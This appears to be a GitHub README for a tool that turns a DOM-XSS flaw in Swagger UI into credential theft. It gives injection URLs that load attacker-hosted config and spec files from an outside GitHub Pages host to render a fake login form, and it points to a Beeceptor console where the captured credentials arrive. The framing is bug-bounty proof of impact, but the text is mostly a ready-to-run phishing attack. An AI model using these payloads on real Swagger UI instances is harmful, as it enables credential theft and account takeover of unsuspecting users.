M0x0101 / shekoko-main

Steal Users Credentials via Swagger UI DOM-XSS

Found an XSS in Swagger UI, but the triager didn't accept it because there is no cookie to steal?

Use this repo to render a fake login form inside Swagger UI and capture the user's credentials.

Read this article first: https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/ and then practice with https://medium.com/@AlQa3Qa3_M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96

Demo

If you find a Swagger UI instance, first test whether it is vulnerable to XSS:

    inject this at https://api.redirect.com/swagger/index.html?configUrl=https://m0x0101.github.io/lol/test.json
    or 
    https://api.redirect.com/swagger/index.html?url=https://m0x0101.github.io/lol/test.yaml

To steal users' credentials with the fake login form:

1.  inject this at https://api.redirect.com/swagger/index.html?configUrl=https://m0x0101.github.io/lol/credentials_form.json
    or 
    https://api.redirect.com/swagger/index.html?url=https://m0x0101.github.io/lol/credentials_form.yaml
2.  visit https://app.beeceptor.com/console/alqa3qa3m0x0101

Feedback

If you have any feedback, please reach out to us at m0x0101.ctf@gmail.com

Resources

https://medium.com/@AlQa3Qa3_M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96

https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/

Tech Stack

Client: HTML, JS